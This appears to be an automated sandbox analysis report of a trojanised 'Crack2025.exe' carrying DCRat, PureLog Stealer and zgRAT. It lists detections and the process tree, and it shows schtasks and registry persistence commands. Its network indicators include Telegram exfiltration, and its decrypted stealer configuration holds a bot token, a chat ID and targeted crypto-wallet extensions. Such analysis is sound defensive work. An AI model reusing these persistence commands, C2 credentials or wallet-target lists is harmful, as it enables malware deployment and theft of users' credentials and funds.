Windows Analysis Report
Crack2025.exe

Overview

General Information

Sample name: Crack2025.exe
Analysis ID: 1639972
MD5: 8799753790734ab065ddfdf5fadf4c9f
SHA1: 64bf9d7eadc069096c95fa363e36455545a529f1
SHA256: c8af00d11b473b532868ad15bafda07122c04e69982c140533b693945b166090
Tags: DCRat, exe, user-aachum

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Joe Sandbox ML detected suspicious sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Crack2025.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\Crack2025.exe" MD5: 8799753790734AB065DDFDF5FADF4C9F)
    • wscript.exe (PID: 4100 cmdline: "C:\Windows\System32\WScript.exe" "C:\Crtsvc\4ATaaGAsjCFOWm7aY5r6I.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 8336 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Crtsvc\wDGuVcXResLqCSg5nclCwVUnbT.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ComComponentRuntimeMonitor.exe (PID: 8388 cmdline: "C:\Crtsvc/ComComponentRuntimeMonitor.exe" MD5: 9939A508443B50F3065506B3EF554C79)
          • schtasks.exe (PID: 8628 cmdline: schtasks.exe /create /tn "xP1x1VNeIAPjWsHHYbBFNFYx" /sc MINUTE /mo 9 /tr "'C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8652 cmdline: schtasks.exe /create /tn "xP1x1VNeIAPjWsHHYbBFNFY" /sc ONLOGON /tr "'C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8684 cmdline: schtasks.exe /create /tn "xP1x1VNeIAPjWsHHYbBFNFYx" /sc MINUTE /mo 5 /tr "'C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 8708 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 8716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 8784 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD4D5.tmp" "c:\Windows\System32\CSCFA026A3CF3B54234ABC92E8882BC4427.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 8812 cmdline: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Desktop\ShellExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8840 cmdline: schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Users\Default User\Desktop\ShellExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8864 cmdline: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Desktop\ShellExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8888 cmdline: schtasks.exe /create /tn "aePhPQ5epIOPbGayHva" /sc MINUTE /mo 10 /tr "'C:\Crtsvc\aePhPQ5epIOPbGayHv.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8912 cmdline: schtasks.exe /create /tn "aePhPQ5epIOPbGayHv" /sc ONLOGON /tr "'C:\Crtsvc\aePhPQ5epIOPbGayHv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8940 cmdline: schtasks.exe /create /tn "aePhPQ5epIOPbGayHva" /sc MINUTE /mo 8 /tr "'C:\Crtsvc\aePhPQ5epIOPbGayHv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8964 cmdline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\smartscreen.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8992 cmdline: schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Users\All Users\smartscreen.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 9020 cmdline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\smartscreen.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 9044 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Pictures\Registry.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 9068 cmdline: schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Public\Pictures\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 9092 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Pictures\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 9116 cmdline: schtasks.exe /create /tn "ComComponentRuntimeMonitorC" /sc MINUTE /mo 5 /tr "'C:\Crtsvc\ComComponentRuntimeMonitor.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 9140 cmdline: schtasks.exe /create /tn "ComComponentRuntimeMonitor" /sc ONLOGON /tr "'C:\Crtsvc\ComComponentRuntimeMonitor.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 9168 cmdline: schtasks.exe /create /tn "ComComponentRuntimeMonitorC" /sc MINUTE /mo 6 /tr "'C:\Crtsvc\ComComponentRuntimeMonitor.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • xP1x1VNeIAPjWsHHYbBFNFY.exe (PID: 8668 cmdline: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • aePhPQ5epIOPbGayHv.exe (PID: 6116 cmdline: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • aePhPQ5epIOPbGayHv.exe (PID: 5156 cmdline: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • Registry.exe (PID: 3432 cmdline: C:\Users\Public\Pictures\Registry.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • Registry.exe (PID: 412 cmdline: C:\Users\Public\Pictures\Registry.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Crtsvc\ComComponentRuntimeMonitor.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Crtsvc\ComComponentRuntimeMonitor.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\ProgramData\smartscreen.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
00000009.00000000.1401692601.00000000002D2000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1264146143.00000000073E4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000009.00000002.1485618171.00000000127BB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: ComComponentRuntimeMonitor.exe PID: 8388 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: xP1x1VNeIAPjWsHHYbBFNFY.exe PID: 8668 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
9.0.ComComponentRuntimeMonitor.exe.2d0000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
9.0.ComComponentRuntimeMonitor.exe.2d0000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                          System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Pictures\Registry.exe, CommandLine: C:\Users\Public\Pictures\Registry.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Pictures\Registry.exe, NewProcessName: C:\Users\Public\Pictures\Registry.exe, OriginalFileName: C:\Users\Public\Pictures\Registry.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Users\Public\Pictures\Registry.exe, ProcessId: 3432, ProcessName: Registry.exe
Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ProcessId: 8388, TargetFilename: C:\Users\All Users\smartscreen.exe
Source: Registry Key set, Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Public\Pictures\Registry.exe", EventID: 13, EventType: SetValue, Image: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ProcessId: 8388, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe", EventID: 13, EventType: SetValue, Image: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ProcessId: 8388, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xP1x1VNeIAPjWsHHYbBFNFY
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe", EventID: 13, EventType: SetValue, Image: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ProcessId: 8388, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started, Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Crtsvc/ComComponentRuntimeMonitor.exe", ParentImage: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ParentProcessId: 8388, ParentProcessName: ComComponentRuntimeMonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline", ProcessId: 8708, ProcessName: csc.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Pictures\Registry.exe'" /f, CommandLine: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Pictures\Registry.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Crtsvc/ComComponentRuntimeMonitor.exe", ParentImage: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ParentProcessId: 8388, ParentProcessName: ComComponentRuntimeMonitor.exe, ProcessCommandLine: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Pictures\Registry.exe'" /f, ProcessId: 9044, ProcessName: schtasks.exe
Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Crtsvc\4ATaaGAsjCFOWm7aY5r6I.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Crtsvc\4ATaaGAsjCFOWm7aY5r6I.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Crack2025.exe", ParentImage: C:\Users\user\Desktop\Crack2025.exe, ParentProcessId: 7144, ParentProcessName: Crack2025.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Crtsvc\4ATaaGAsjCFOWm7aY5r6I.vbe" , ProcessId: 4100, ProcessName: wscript.exe
Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ProcessId: 8388, TargetFilename: C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline

                          Data Obfuscation

Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Crtsvc/ComComponentRuntimeMonitor.exe", ParentImage: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ParentProcessId: 8388, ParentProcessName: ComComponentRuntimeMonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline", ProcessId: 8708, ProcessName: csc.exe

                          Persistence and Installation Behavior

Source: Process started, Author: Joe Security: Data: Command: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\smartscreen.exe'" /f, CommandLine: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\smartscreen.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Crtsvc/ComComponentRuntimeMonitor.exe", ParentImage: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ParentProcessId: 8388, ParentProcessName: ComComponentRuntimeMonitor.exe, ProcessCommandLine: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\smartscreen.exe'" /f, ProcessId: 8964, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-16T19:31:51.117740+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49732 | 172.67.159.138 | 80 | TCP
2025-03-16T19:31:24.394548+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49725 | 34.117.59.81 | 443 | TCP
2025-03-16T19:32:24.401908+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49739 | 34.117.59.81 | 443 | TCP
2025-03-16T19:31:25.584055+0100 | 1810009 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49728 | 149.154.167.220 | 443 | TCP
2025-03-16T19:32:25.363006+0100 | 1810009 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49740 | 149.154.167.220 | 443 | TCP

                          AV Detection

Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\tvkLaiES.log, Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\Public\Pictures\Registry.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Crtsvc\4ATaaGAsjCFOWm7aY5r6I.vbe, Avira: detection malicious, Label: VBS/Runner.VPA
Source: C:\Users\user\Desktop\KbrbnaEo.log, Avira: detection malicious, Label: TR/Spy.xaclu
Source: C:\Users\user\Desktop\kMRvrGzk.log, Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\GDyy9YDsU6.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\ProgramData\smartscreen.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\Default\Desktop\ShellExperienceHost.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ReversingLabs: Detection: 65%
Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe, ReversingLabs: Detection: 65%
Source: C:\ProgramData\smartscreen.exe, ReversingLabs: Detection: 65%
Source: C:\Users\Default\Desktop\ShellExperienceHost.exe, ReversingLabs: Detection: 65%
Source: C:\Users\Public\Pictures\Registry.exe, ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\SFAQXTUW.log, ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\ZgWXldfI.log, ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\biIGHMkD.log, ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\kMRvrGzk.log, ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\tvkLaiES.log, ReversingLabs: Detection: 70%
Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe, ReversingLabs: Detection: 65%
Source: Crack2025.exe, Virustotal: Detection: 72%
Source: Crack2025.exe, ReversingLabs: Detection: 66%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                          Source: 00000009.00000002.1485618171.00000000127BB000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"TelegramNotifer":{"chatid":"6289890180","bottoken":"7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM","settings":"new user connect !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"True","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"}}
                          Source: 00000009.00000002.1485618171.00000000127BB000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-lyFL9C96UdpRArWkuUmQ","0","????????+??????????","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: Crack2025.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: Crack2025.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Crack2025.exe
                          Source: Binary string: 8C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.pdb source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp

                          Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\Crack2025.exe, Code function: 0_2_00B4A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00B4A69B
Source: C:\Users\user\Desktop\Crack2025.exe, Code function: 0_2_00B5C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00B5C220
Source: C:\Users\user\Desktop\Crack2025.exe, Code function: 0_2_00B6B348 FindFirstFileExA,0_2_00B6B348
Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe, File opened: C:\Users\user
Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe, File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe, File opened: C:\Users\user\AppData
Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe, File opened: C:\Users\user\AppData\Local
Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe, File opened: C:\Users\user\Desktop\desktop.ini

                          Networking

Source: Network traffic, Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49732 -> 172.67.159.138:80
Source: Network traffic, Suricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.5:49740 -> 149.154.167.220:443
Source: Network traffic, Suricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.5:49728 -> 149.154.167.220:443
Source: unknown, DNS query: name: api.telegram.org
Source: global traffic, HTTP traffic detected: GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /country HTTP/1.1 Host: ipinfo.io
